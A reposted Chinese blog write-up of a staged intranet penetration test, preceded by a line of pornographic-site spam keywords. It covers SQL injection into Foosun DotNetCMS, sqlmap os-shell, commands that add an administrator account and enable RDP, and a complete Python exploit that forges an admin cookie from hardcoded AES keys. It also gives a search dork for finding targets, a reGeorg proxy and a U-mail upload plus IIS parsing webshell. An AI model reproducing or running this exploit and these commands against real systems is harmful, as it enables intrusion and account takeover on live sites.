日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問(wèn) 生活随笔!

生活随笔

當(dāng)前位置: 首頁(yè) > 编程资源 > 编程问答 >内容正文

编程问答

记录一次【模仿真实环境】的内网漫游

發(fā)布時(shí)間:2025/7/14 编程问答 25 豆豆
生活随笔 收集整理的這篇文章主要介紹了 记录一次【模仿真实环境】的内网漫游 小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

?

?

?

一階段、

信息收集

通過(guò)NMAP進(jìn)行端口掃描 發(fā)現(xiàn)網(wǎng)站開(kāi)放了80,443,700,8080端口

80端口下存在web服務(wù) :Foosun DotNetCMS 2.0? 網(wǎng)站為IIS搭建的aspx站? 服務(wù)器操作系統(tǒng)為win2008

8080端口下存在路由登錄界面

?

二、web滲透、

瀏覽網(wǎng)站發(fā)現(xiàn)網(wǎng)站使用了FoosunCMS

?

尋找相關(guān)漏洞

www.text.com/user/City_ajax.aspx?CityId=1

處存在sql注入

?

?

http://192.168.31.55/user/City_ajax.aspx?CityId=1%27%20union%20all%20select%20UserNum,U

serNum%20from%20dbo.fs_sys_User%20where%20UserName=%27admin

?

?

Table: fs_sys_admin

?

[1 entry]

?

+--------------+

?

| UserNum ?????|

?

+--------------+

?

| 327142054961 |

?

+--------------+

?

這里只跑出來(lái)了一個(gè)uerrnumber沒(méi)有我們想要的后臺(tái)賬號(hào)和密碼

但是發(fā)現(xiàn)這個(gè)注入又寫入權(quán)限

不過(guò)? ?并不知道絕對(duì)路徑

然后我們利用--os-shell發(fā)現(xiàn)交互了一個(gè)shell并且是系統(tǒng)權(quán)限

?

開(kāi)啟3389 并建立一個(gè)用戶成功了

并且我們獲得權(quán)限的主機(jī)IP為192.168.1.123

網(wǎng)關(guān)為192.168.1.1

?

?

?

?

net user szg 123456 /add & net localgroup administrators szg /add

?

?

?

?

?

?

?

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

?

?

?

?

?

?

?

?接下來(lái)我們利用網(wǎng)上爆出的漏洞利用該usernum生成一個(gè)cookie

腳本如下:

#coding:utf-8
import argparse
import urllib
import traceback
import base64
from Crypto.Cipher import AES
from binascii import b2a_hex, a2b_hex
###############################
##search keyword: ##
##inurl:/manage/Login.aspx ##
###############################
KEY = 'Guz(%&hj7x89H$yuBI0456FtmaT5&fvHUFCy76*h%(HilJ$lhj!y6&(*jkP87jH7'
IV = 'E4ghj*Ghg7!rNIfb&95GUY86GfghUb#er57HBh(u%g6HJ($jhWk7&!hg4ui%$hjk'
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="the url", required=True, nargs="+")
return parser.parse_args()
def run(url):
try:
usernumber = get_usernumber(url)
if usernumber is not None:
encrypt_cookie = generate_cookie(usernumber)
#寫入cookie中
write_cookie(url, encrypt_cookie)
except Exception:
traceback.print_exc()
def get_usernumber(url):
fullurl = url + "/user/City_ajax.aspx?CityId=1' union all select UserNum,UserNum from dbo.fs_sys_User where UserName='admin"
content = urllib.urlopen(fullurl).read()
index = content.index("<option value=\"")
if index != -1:
usernumber = content[index+15:]
usernumber = usernumber[0: content.index("\"")+1]
print "Get usernumber success. Usernumber is :", usernumber
return usernumber
else:
print "Get usernumber fail"
return None
def pkcs7padding(data):
bs = AES.block_size
padding = bs - len(data) % bs
padding_text = chr(padding) * padding
return data + padding_text
def generate_cookie(usernumber):
orgstr = "%s,admin,0,1,False"%(usernumber,)
cryptor = AES.new(KEY[0:32], AES.MODE_CBC, IV[0:16])
ciphertext = cryptor.encrypt(pkcs7padding(orgstr))
ciphertext = base64.b64encode(ciphertext)
return ciphertext
def write_cookie(url, ciphercookie):
print "Generate Cookie[SITEINFO]:", ciphercookie
print "Now you can write cookie and access the url: %s/manage/index.aspx"%(url,)
if __name__ == '__main__':
args = parse_args()
try:
if args.url is not None:
run(args.url[0])
except Exception, e:
print "python Foosun_exp.py -u [url]"

?###這里python運(yùn)行該腳本需要加載一個(gè)模塊忘了叫啥了提示的時(shí)候百度一下那個(gè)名字然后 pip? install??

接下來(lái)利用谷歌瀏覽器的

EditThisCookie插件利用該cookie登陸后臺(tái)

成功登陸到后臺(tái)

?

?

?

上傳一句話之后發(fā)現(xiàn)鏈接上了一句話顯示200卻沒(méi)有回顯

?

但是利用reGeorg掛了個(gè)代理成功了

?

?

這時(shí)候我們拿到了代理權(quán)限并且添加了管理員賬戶(這里具體請(qǐng)看我的另一篇文章https://www.cnblogs.com/xiaoyunxiaogang/p/10939485.html)

這時(shí)候就可以連接3389了

在遠(yuǎn)程連接的主機(jī)192.168.1.123中

翻到了管理員記錄的密碼

?

?

接下來(lái)利用獲得的密碼試著登陸8080端口一下發(fā)現(xiàn)限制了IP

利用代理繼續(xù)登陸

?

?掛代理之后成功登陸

?

三、內(nèi)網(wǎng)漫游、

?

這里我們?cè)诼酚芍邪l(fā)現(xiàn)了另一個(gè)網(wǎng)段

?

?

如果沒(méi)有進(jìn)行Vlan的劃分那么我們的192.168.1.123就可以ping通172.19.23.123

接下來(lái)掃描端口并訪問(wèn)172.19.23.123下的網(wǎng)站

?

?

?

利用之前3389連接遠(yuǎn)程珠桌面獲得的密碼進(jìn)行登陸

?

?

同樣利用u-mail的漏洞進(jìn)行滲透

該漏洞的上傳路徑為http://172.19.23.123/webmail/client/cache/userid/重命名序號(hào)

?

?

http://172.19.23.123/webmail/client/oab/index.php?module=operate&action=member-get&page=1&orderby=&is_reverse=1&keyword=xgk

?

構(gòu)造上傳頁(yè)面調(diào)用上傳接口

?

?

?

?

?利用iis的解析漏洞+/1.php訪問(wèn)(????不是ngix解析漏洞嗎??? 不 !IIS也可以)

http://172.19.23.123/webmail/client/cache/3/15598087978.jpg/1.php

?

?

?

轉(zhuǎn)載于:https://www.cnblogs.com/xiaoyunxiaogang/p/10994590.html

總結(jié)

以上是生活随笔為你收集整理的记录一次【模仿真实环境】的内网漫游的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。